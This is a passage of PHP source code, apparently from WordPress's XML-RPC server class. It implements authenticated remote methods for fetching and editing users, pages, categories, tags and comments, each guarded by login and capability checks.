$taxonomies = get_taxonomies( $filter, 'objects' );
// Holds all the taxonomy data.
$struct = array();
foreach ( $taxonomies as $taxonomy ) {
// Capability check for post types.
if ( ! current_user_can( $taxonomy->cap->assign_terms ) ) {
continue;
}
$struct[] = $this->_prepare_taxonomy( $taxonomy, $fields );
}
return $struct;
}
/**
* Retrieves a user.
*
* The optional $fields parameter specifies what fields will be included
* in the response array. This should be a list of field names. 'user_id' will
* always be included in the response regardless of the value of $fields.
*
* Instead of, or in addition to, individual field names, conceptual group
* names can be used to specify multiple fields. The available conceptual
* groups are 'basic' and 'all'.
*
* @uses get_userdata()
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type int $3 User ID.
* @type array $4 Optional. Array of fields to return.
* }
* @return array|IXR_Error Array contains (based on $fields parameter):
* - 'user_id'
* - 'username'
* - 'first_name'
* - 'last_name'
* - 'registered'
* - 'bio'
* - 'email'
* - 'nickname'
* - 'nicename'
* - 'url'
* - 'display_name'
* - 'roles'
*/
public function wp_getUser( $args ) {
if ( ! $this->minimum_args( $args, 4 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$user_id = (int) $args[3];
if ( isset( $args[4] ) ) {
$fields = $args[4];
} else {
/**
* Filters the default user query fields used by the given XML-RPC method.
*
* @since 3.5.0
*
* @param array $fields An array of user fields to retrieve. By default, contains 'all'.
* @param string $method The method name.
*/
$fields = apply_filters( 'xmlrpc_default_user_fields', array( 'all' ), 'wp.getUser' );
}
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getUser', $args, $this );
if ( ! current_user_can( 'edit_user', $user_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit this user.' ) );
}
$user_data = get_userdata( $user_id );
if ( ! $user_data ) {
return new IXR_Error( 404, __( 'Invalid user ID.' ) );
}
return $this->_prepare_user( $user_data, $fields );
}
/**
* Retrieves users.
*
* The optional $filter parameter modifies the query used to retrieve users.
* Accepted keys are 'number' (default: 50), 'offset' (default: 0), 'role',
* 'who', 'orderby', and 'order'.
*
* The optional $fields parameter specifies what fields will be included
* in the response array.
*
* @uses get_users()
* @see wp_getUser() for more on $fields and return values
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type array $3 Optional. Arguments for the user query.
* @type array $4 Optional. Fields to return.
* }
* @return array|IXR_Error users data
*/
public function wp_getUsers( $args ) {
if ( ! $this->minimum_args( $args, 3 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$filter = isset( $args[3] ) ? $args[3] : array();
if ( isset( $args[4] ) ) {
$fields = $args[4];
} else {
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
$fields = apply_filters( 'xmlrpc_default_user_fields', array( 'all' ), 'wp.getUsers' );
}
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getUsers', $args, $this );
if ( ! current_user_can( 'list_users' ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to list users.' ) );
}
$query = array( 'fields' => 'all_with_meta' );
$query['number'] = ( isset( $filter['number'] ) ) ? absint( $filter['number'] ) : 50;
$query['offset'] = ( isset( $filter['offset'] ) ) ? absint( $filter['offset'] ) : 0;
if ( isset( $filter['orderby'] ) ) {
$query['orderby'] = $filter['orderby'];
if ( isset( $filter['order'] ) ) {
$query['order'] = $filter['order'];
}
}
if ( isset( $filter['role'] ) ) {
if ( get_role( $filter['role'] ) === null ) {
return new IXR_Error( 403, __( 'Invalid role.' ) );
}
$query['role'] = $filter['role'];
}
if ( isset( $filter['who'] ) ) {
$query['who'] = $filter['who'];
}
$users = get_users( $query );
$_users = array();
foreach ( $users as $user_data ) {
if ( current_user_can( 'edit_user', $user_data->ID ) ) {
$_users[] = $this->_prepare_user( $user_data, $fields );
}
}
return $_users;
}
/**
* Retrieves information about the requesting user.
*
* @uses get_userdata()
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username
* @type string $2 Password
* @type array $3 Optional. Fields to return.
* }
* @return array|IXR_Error (@see wp_getUser)
*/
public function wp_getProfile( $args ) {
if ( ! $this->minimum_args( $args, 3 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
if ( isset( $args[3] ) ) {
$fields = $args[3];
} else {
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
$fields = apply_filters( 'xmlrpc_default_user_fields', array( 'all' ), 'wp.getProfile' );
}
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getProfile', $args, $this );
if ( ! current_user_can( 'edit_user', $user->ID ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit your profile.' ) );
}
$user_data = get_userdata( $user->ID );
return $this->_prepare_user( $user_data, $fields );
}
/**
* Edits user's profile.
*
* @uses wp_update_user()
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type array $3 Content struct. It can optionally contain:
* - 'first_name'
* - 'last_name'
* - 'website'
* - 'display_name'
* - 'nickname'
* - 'nicename'
* - 'bio'
* }
* @return true|IXR_Error True, on success.
*/
public function wp_editProfile( $args ) {
if ( ! $this->minimum_args( $args, 4 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$content_struct = $args[3];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.editProfile', $args, $this );
if ( ! current_user_can( 'edit_user', $user->ID ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit your profile.' ) );
}
// Holds data of the user.
$user_data = array();
$user_data['ID'] = $user->ID;
// Only set the user details if they were given.
if ( isset( $content_struct['first_name'] ) ) {
$user_data['first_name'] = $content_struct['first_name'];
}
if ( isset( $content_struct['last_name'] ) ) {
$user_data['last_name'] = $content_struct['last_name'];
}
if ( isset( $content_struct['url'] ) ) {
$user_data['user_url'] = $content_struct['url'];
}
if ( isset( $content_struct['display_name'] ) ) {
$user_data['display_name'] = $content_struct['display_name'];
}
if ( isset( $content_struct['nickname'] ) ) {
$user_data['nickname'] = $content_struct['nickname'];
}
if ( isset( $content_struct['nicename'] ) ) {
$user_data['user_nicename'] = $content_struct['nicename'];
}
if ( isset( $content_struct['bio'] ) ) {
$user_data['description'] = $content_struct['bio'];
}
$result = wp_update_user( $user_data );
if ( is_wp_error( $result ) ) {
return new IXR_Error( 500, $result->get_error_message() );
}
if ( ! $result ) {
return new IXR_Error( 500, __( 'Sorry, the user could not be updated.' ) );
}
return true;
}
/**
* Retrieves a page.
*
* @since 2.2.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type int $1 Page ID.
* @type string $2 Username.
* @type string $3 Password.
* }
* @return array|IXR_Error
*/
public function wp_getPage( $args ) {
$this->escape( $args );
$page_id = (int) $args[1];
$username = $args[2];
$password = $args[3];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
$page = get_post( $page_id );
if ( ! $page ) {
return new IXR_Error( 404, __( 'Invalid post ID.' ) );
}
if ( ! current_user_can( 'edit_page', $page_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit this page.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getPage', $args, $this );
// If we found the page then format the data.
if ( $page->ID && ( 'page' === $page->post_type ) ) {
return $this->_prepare_page( $page );
} else {
// If the page doesn't exist, indicate that.
return new IXR_Error( 404, __( 'Sorry, no such page.' ) );
}
}
/**
* Retrieves Pages.
*
* @since 2.2.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type int $3 Optional. Number of pages. Default 10.
* }
* @return array|IXR_Error
*/
public function wp_getPages( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$num_pages = isset( $args[3] ) ? (int) $args[3] : 10;
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! current_user_can( 'edit_pages' ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit pages.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getPages', $args, $this );
$pages = get_posts(
array(
'post_type' => 'page',
'post_status' => 'any',
'numberposts' => $num_pages,
)
);
$num_pages = count( $pages );
// If we have pages, put together their info.
if ( $num_pages >= 1 ) {
$pages_struct = array();
foreach ( $pages as $page ) {
if ( current_user_can( 'edit_page', $page->ID ) ) {
$pages_struct[] = $this->_prepare_page( $page );
}
}
return $pages_struct;
}
return array();
}
/**
* Creates a new page.
*
* @since 2.2.0
*
* @see wp_xmlrpc_server::mw_newPost()
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type array $3 Content struct.
* }
* @return int|IXR_Error
*/
public function wp_newPage( $args ) {
// Items not escaped here will be escaped in wp_newPost().
$username = $this->escape( $args[1] );
$password = $this->escape( $args[2] );
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.newPage', $args, $this );
// Mark this as content for a page.
$args[3]['post_type'] = 'page';
// Let mw_newPost() do all of the heavy lifting.
return $this->mw_newPost( $args );
}
/**
* Deletes a page.
*
* @since 2.2.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type int $3 Page ID.
* }
* @return true|IXR_Error True, if success.
*/
public function wp_deletePage( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$page_id = (int) $args[3];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.deletePage', $args, $this );
/*
* Get the current page based on the 'page_id' and
* make sure it is a page and not a post.
*/
$actual_page = get_post( $page_id, ARRAY_A );
if ( ! $actual_page || ( 'page' !== $actual_page['post_type'] ) ) {
return new IXR_Error( 404, __( 'Sorry, no such page.' ) );
}
// Make sure the user can delete pages.
if ( ! current_user_can( 'delete_page', $page_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to delete this page.' ) );
}
// Attempt to delete the page.
$result = wp_delete_post( $page_id );
if ( ! $result ) {
return new IXR_Error( 500, __( 'Failed to delete the page.' ) );
}
/**
* Fires after a page has been successfully deleted via XML-RPC.
*
* @since 3.4.0
*
* @param int $page_id ID of the deleted page.
* @param array $args An array of arguments to delete the page.
*/
do_action( 'xmlrpc_call_success_wp_deletePage', $page_id, $args ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.NotLowercase
return true;
}
/**
* Edits a page.
*
* @since 2.2.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type int $1 Page ID.
* @type string $2 Username.
* @type string $3 Password.
* @type string $4 Content.
* @type int $5 Publish flag. 0 for draft, 1 for publish.
* }
* @return array|IXR_Error
*/
public function wp_editPage( $args ) {
// Items will be escaped in mw_editPost().
$page_id = (int) $args[1];
$username = $args[2];
$password = $args[3];
$content = $args[4];
$publish = $args[5];
$escaped_username = $this->escape( $username );
$escaped_password = $this->escape( $password );
$user = $this->login( $escaped_username, $escaped_password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.editPage', $args, $this );
// Get the page data and make sure it is a page.
$actual_page = get_post( $page_id, ARRAY_A );
if ( ! $actual_page || ( 'page' !== $actual_page['post_type'] ) ) {
return new IXR_Error( 404, __( 'Sorry, no such page.' ) );
}
// Make sure the user is allowed to edit pages.
if ( ! current_user_can( 'edit_page', $page_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit this page.' ) );
}
// Mark this as content for a page.
$content['post_type'] = 'page';
// Arrange args in the way mw_editPost() understands.
$args = array(
$page_id,
$username,
$password,
$content,
$publish,
);
// Let mw_editPost() do all of the heavy lifting.
return $this->mw_editPost( $args );
}
/**
* Retrieves page list.
*
* @since 2.2.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* }
* @return array|IXR_Error
*/
public function wp_getPageList( $args ) {
global $wpdb;
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! current_user_can( 'edit_pages' ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit pages.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getPageList', $args, $this );
// Get list of page IDs and titles.
$page_list = $wpdb->get_results(
"
SELECT ID page_id,
post_title page_title,
post_parent page_parent_id,
post_date_gmt,
post_date,
post_status
FROM {$wpdb->posts}
WHERE post_type = 'page'
ORDER BY ID
"
);
// The date needs to be formatted properly.
$num_pages = count( $page_list );
for ( $i = 0; $i < $num_pages; $i++ ) {
$page_list[ $i ]->dateCreated = $this->_convert_date( $page_list[ $i ]->post_date );
$page_list[ $i ]->date_created_gmt = $this->_convert_date_gmt( $page_list[ $i ]->post_date_gmt, $page_list[ $i ]->post_date );
unset( $page_list[ $i ]->post_date_gmt );
unset( $page_list[ $i ]->post_date );
unset( $page_list[ $i ]->post_status );
}
return $page_list;
}
/**
* Retrieves authors list.
*
* @since 2.2.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* }
* @return array|IXR_Error
*/
public function wp_getAuthors( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! current_user_can( 'edit_posts' ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit posts.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getAuthors', $args, $this );
$authors = array();
foreach ( get_users( array( 'fields' => array( 'ID', 'user_login', 'display_name' ) ) ) as $user ) {
$authors[] = array(
'user_id' => $user->ID,
'user_login' => $user->user_login,
'display_name' => $user->display_name,
);
}
return $authors;
}
/**
* Gets the list of all tags.
*
* @since 2.7.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* }
* @return array|IXR_Error
*/
public function wp_getTags( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! current_user_can( 'edit_posts' ) ) {
return new IXR_Error( 401, __( 'Sorry, you must be able to edit posts on this site in order to view tags.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getKeywords', $args, $this );
$tags = array();
$all_tags = get_tags();
if ( $all_tags ) {
foreach ( (array) $all_tags as $tag ) {
$struct = array();
$struct['tag_id'] = $tag->term_id;
$struct['name'] = $tag->name;
$struct['count'] = $tag->count;
$struct['slug'] = $tag->slug;
$struct['html_url'] = esc_html( get_tag_link( $tag->term_id ) );
$struct['rss_url'] = esc_html( get_tag_feed_link( $tag->term_id ) );
$tags[] = $struct;
}
}
return $tags;
}
/**
* Creates a new category.
*
* @since 2.2.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type array $3 Category.
* }
* @return int|IXR_Error Category ID.
*/
public function wp_newCategory( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$category = $args[3];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.newCategory', $args, $this );
// Make sure the user is allowed to add a category.
if ( ! current_user_can( 'manage_categories' ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to add a category.' ) );
}
/*
* If no slug was provided, make it empty
* so that WordPress will generate one.
*/
if ( empty( $category['slug'] ) ) {
$category['slug'] = '';
}
/*
* If no parent_id was provided, make it empty
* so that it will be a top-level page (no parent).
*/
if ( ! isset( $category['parent_id'] ) ) {
$category['parent_id'] = '';
}
// If no description was provided, make it empty.
if ( empty( $category['description'] ) ) {
$category['description'] = '';
}
$new_category = array(
'cat_name' => $category['name'],
'category_nicename' => $category['slug'],
'category_parent' => $category['parent_id'],
'category_description' => $category['description'],
);
$cat_id = wp_insert_category( $new_category, true );
if ( is_wp_error( $cat_id ) ) {
if ( 'term_exists' === $cat_id->get_error_code() ) {
return (int) $cat_id->get_error_data();
} else {
return new IXR_Error( 500, __( 'Sorry, the category could not be created.' ) );
}
} elseif ( ! $cat_id ) {
return new IXR_Error( 500, __( 'Sorry, the category could not be created.' ) );
}
/**
* Fires after a new category has been successfully created via XML-RPC.
*
* @since 3.4.0
*
* @param int $cat_id ID of the new category.
* @param array $args An array of new category arguments.
*/
do_action( 'xmlrpc_call_success_wp_newCategory', $cat_id, $args ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.NotLowercase
return $cat_id;
}
/**
* Deletes a category.
*
* @since 2.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type int $3 Category ID.
* }
* @return bool|IXR_Error See wp_delete_term() for return info.
*/
public function wp_deleteCategory( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$category_id = (int) $args[3];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.deleteCategory', $args, $this );
if ( ! current_user_can( 'delete_term', $category_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to delete this category.' ) );
}
$status = wp_delete_term( $category_id, 'category' );
if ( true === $status ) {
/**
* Fires after a category has been successfully deleted via XML-RPC.
*
* @since 3.4.0
*
* @param int $category_id ID of the deleted category.
* @param array $args An array of arguments to delete the category.
*/
do_action( 'xmlrpc_call_success_wp_deleteCategory', $category_id, $args ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.NotLowercase
}
return $status;
}
/**
* Retrieves category list.
*
* @since 2.2.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type array $3 Category
* @type int $4 Max number of results.
* }
* @return array|IXR_Error
*/
public function wp_suggestCategories( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$category = $args[3];
$max_results = (int) $args[4];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! current_user_can( 'edit_posts' ) ) {
return new IXR_Error( 401, __( 'Sorry, you must be able to edit posts on this site in order to view categories.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.suggestCategories', $args, $this );
$category_suggestions = array();
$args = array(
'get' => 'all',
'number' => $max_results,
'name__like' => $category,
);
foreach ( (array) get_categories( $args ) as $cat ) {
$category_suggestions[] = array(
'category_id' => $cat->term_id,
'category_name' => $cat->name,
);
}
return $category_suggestions;
}
/**
* Retrieves a comment.
*
* @since 2.7.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type int $3 Comment ID.
* }
* @return array|IXR_Error
*/
public function wp_getComment( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$comment_id = (int) $args[3];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getComment', $args, $this );
$comment = get_comment( $comment_id );
if ( ! $comment ) {
return new IXR_Error( 404, __( 'Invalid comment ID.' ) );
}
if ( ! current_user_can( 'edit_comment', $comment_id ) ) {
return new IXR_Error( 403, __( 'Sorry, you are not allowed to moderate or edit this comment.' ) );
}
return $this->_prepare_comment( $comment );
}
/**
* Retrieves comments.
*
* Besides the common blog_id (unused), username, and password arguments,
* it takes a filter array as the last argument.
*
* Accepted 'filter' keys are 'status', 'post_id', 'offset', and 'number'.
*
* The defaults are as follows:
* - 'status' - Default is ''. Filter by status (e.g., 'approve', 'hold')
* - 'post_id' - Default is ''. The post where the comment is posted.
* Empty string shows all comments.
* - 'number' - Default is 10. Total number of media items to retrieve.
* - 'offset' - Default is 0. See WP_Query::query() for more.
*
* @since 2.7.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type array $3 Optional. Query arguments.
* }
* @return array|IXR_Error Array containing a collection of comments.
* See wp_xmlrpc_server::wp_getComment() for a description
* of each item contents.
*/
public function wp_getComments( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$struct = isset( $args[3] ) ? $args[3] : array();
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getComments', $args, $this );
if ( isset( $struct['status'] ) ) {
$status = $struct['status'];
} else {
$status = '';
}
if ( ! current_user_can( 'moderate_comments' ) && 'approve' !== $status ) {
return new IXR_Error( 401, __( 'Invalid comment status.' ) );
}
$post_id = '';
if ( isset( $struct['post_id'] ) ) {
$post_id = absint( $struct['post_id'] );
}
$post_type = '';
if ( isset( $struct['post_type'] ) ) {
$post_type_object = get_post_type_object( $struct['post_type'] );
if ( ! $post_type_object || ! post_type_supports( $post_type_object->name, 'comments' ) ) {
return new IXR_Error( 404, __( 'Invalid post type.' ) );
}
$post_type = $struct['post_type'];
}
$offset = 0;
if ( isset( $struct['offset'] ) ) {
$offset = absint( $struct['offset'] );
}
$number = 10;
if ( isset( $struct['number'] ) ) {
$number = absint( $struct['number'] );
}
$comments = get_comments(
array(
'status' => $status,
'post_id' => $post_id,
'offset' => $offset,
'number' => $number,
'post_type' => $post_type,
)
);
$comments_struct = array();
if ( is_array( $comments ) ) {
foreach ( $comments as $comment ) {
$comments_struct[] = $this->_prepare_comment( $comment );
}
}
return $comments_struct;
}
/**
* Deletes a comment.
*
* By default, the comment will be moved to the Trash instead of deleted.
* See wp_delete_comment() for more information on this behavior.
*
* @since 2.7.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type int $3 Comment ID.
* }
* @return bool|IXR_Error See wp_delete_comment().
*/
public function wp_deleteComment( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$comment_id = (int) $args[3];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! get_comment( $comment_id ) ) {
return new IXR_Error( 404, __( 'Invalid comment ID.' ) );
}
if ( ! current_user_can( 'edit_comment', $comment_id ) ) {
return new IXR_Error( 403, __( 'Sorry, you are not allowed to delete this comment.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.deleteComment', $args, $this );
$status = wp_delete_comment( $comment_id );
if ( true === $status ) {
/**
* Fires after a comment has been successfully deleted via XML-RPC.
*
* @since 3.4.0
*
* @param int $comment_id ID of the deleted comment.
* @param array $args An array of arguments to delete the comment.
*/
do_action( 'xmlrpc_call_success_wp_deleteComment', $comment_id, $args ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.NotLowercase
}
return $status;
}
/**
* Edits a comment.
*
* Besides the common blog_id (unused), username, and password arguments,
* it takes a comment_id integer and a content_struct array as the last argument.
*
* The allowed keys in the content_struct array are:
* - 'author'
* - 'author_url'
* - 'author_email'
* - 'content'
* - 'date_created_gmt'
* - 'status'. Common statuses are 'approve', 'hold', 'spam'. See get_comment_statuses() for more details.
*
* @since 2.7.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type int $3 Comment ID.
* @type array $4 Content structure.
* }
* @return true|IXR_Error True, on success.
*/
public function wp_editComment( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$comment_id = (int) $args[3];
$content_struct = $args[4];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! get_comment( $comment_id ) ) {
return new IXR_Error( 404, __( 'Invalid comment ID.' ) );
}
if ( ! current_user_can( 'edit_comment', $comment_id ) ) {
return new IXR_Error( 403, __( 'Sorry, you are not allowed to moderate or edit this comment.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.editComment', $args, $this );
$comment = array(
'comment_ID' => $comment_id,
);
if ( isset( $content_struct['status'] ) ) {
$statuses = get_comment_statuses();
$statuses = array_keys( $statuses );
if ( ! in_array( $content_struct['status'], $statuses, true ) ) {
return new IXR_Error( 401, __( 'Invalid comment status.' ) );
}
$comment['comment_approved'] = $content_struct['status'];
}
// Do some timestamp voodoo.
if ( ! empty( $content_struct['date_created_gmt'] ) ) {
// We know this is supposed to be GMT, so we're going to slap that Z on there by force.
$date_created = rtrim( $content_struct['date_created_gmt']->getIso(), 'Z' ) . 'Z';
$comment['comment_date'] = get_date_from_gmt( $date_created );
$comment['comment_date_gmt'] = iso8601_to_datetime( $date_created, 'gmt' );
}
if ( isset( $content_struct['content'] ) ) {
$comment['comment_content'] = $content_struct['content'];
}
if ( isset( $content_struct['author'] ) ) {
$comment['comment_author'] = $content_struct['author'];
}
if ( isset( $content_struct['author_url'] ) ) {
$comment['comment_author_url'] = $content_struct['author_url'];
}
if ( isset( $content_struct['author_email'] ) ) {
$comment['comment_author_email'] = $content_struct['author_email'];
}
$result = wp_update_comment( $comment, true );
if ( is_wp_error( $result ) ) {
return new IXR_Error( 500, $result->get_error_message() );
}
if ( ! $result ) {
return new IXR_Error( 500, __( 'Sorry, the comment could not be updated.' ) );
}
/**
* Fires after a comment has been successfully updated via XML-RPC.
*
* @since 3.4.0
*
* @param int $comment_id ID of the updated comment.
* @param array $args An array of arguments to update the comment.
*/
do_action( 'xmlrpc_call_success_wp_editComment', $comment_id, $args ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.NotLowercase
return true;
}
/**
* Creates a new comment.
*
* @since 2.7.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type string|int $3 Post ID or URL.
* @type array $4 Content structure.
* }
* @return int|IXR_Error See wp_new_comment().
*/
public function wp_newComment( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$post = $args[3];
$content_struct = $args[4];
/**
* Filters whether to allow anonymous comments over XML-RPC.
*
* @since 2.7.0
*
* @param bool $allow Whether to allow anonymous commenting via XML-RPC.
* Default false.
*/
$allow_anon = apply_filters( 'xmlrpc_allow_anonymous_comments', false );
$user = $this->login( $username, $password );
if ( ! $user ) {
$logged_in = false;
if ( $allow_anon && get_option( 'comment_registration' ) ) {
return new IXR_Error( 403, __( 'Sorry, you must be logged in to comment.' ) );
} elseif ( ! $allow_anon ) {
return $this->error;
}
} else {
$logged_in = true;
}
if ( is_numeric( $post ) ) {
$post_id = absint( $post );
} else {
$post_id = url_to_postid( $post );
}
if ( ! $post_id ) {
return new IXR_Error( 404, __( 'Invalid post ID.' ) );
}
if ( ! get_post( $post_id ) ) {
return new IXR_Error( 404, __( 'Invalid post ID.' ) );
}
if ( ! comments_open( $post_id ) ) {
return new IXR_Error( 403, __( 'Sorry, comments are closed for this item.' ) );
}
if (
'publish' === get_post_status( $post_id ) &&
! current_user_can( 'edit_post', $post_id ) &&
post_password_required( $post_id )
) {
return new IXR_Error( 403, __( 'Sorry, you are not allowed to comment on this post.' ) );
}
if (
'private' === get_post_status( $post_id ) &&
! current_user_can( 'read_post', $post_id )
) {
return new IXR_Error( 403, __( 'Sorry, you are not allowed to comment on this post.' ) );
}
$comment = array(
'comment_post_ID' => $post_id,
'comment_content' => trim( $content_struct['content'] ),
);
if ( $logged_in ) {
$display_name = $user->display_name;
$user_email = $user->user_email;
$user_url = $user->user_url;
$comment['comment_author'] = $this->escape( $display_name );
$comment['comment_author_email'] = $this->escape( $user_email );
$comment['comment_author_url'] = $this->escape( $user_url );
$comment['user_id'] = $user->ID;
} else {
$comment['comment_author'] = '';
if ( isset( $content_struct['author'] ) ) {
$comment['comment_author'] = $content_struct['author'];
}
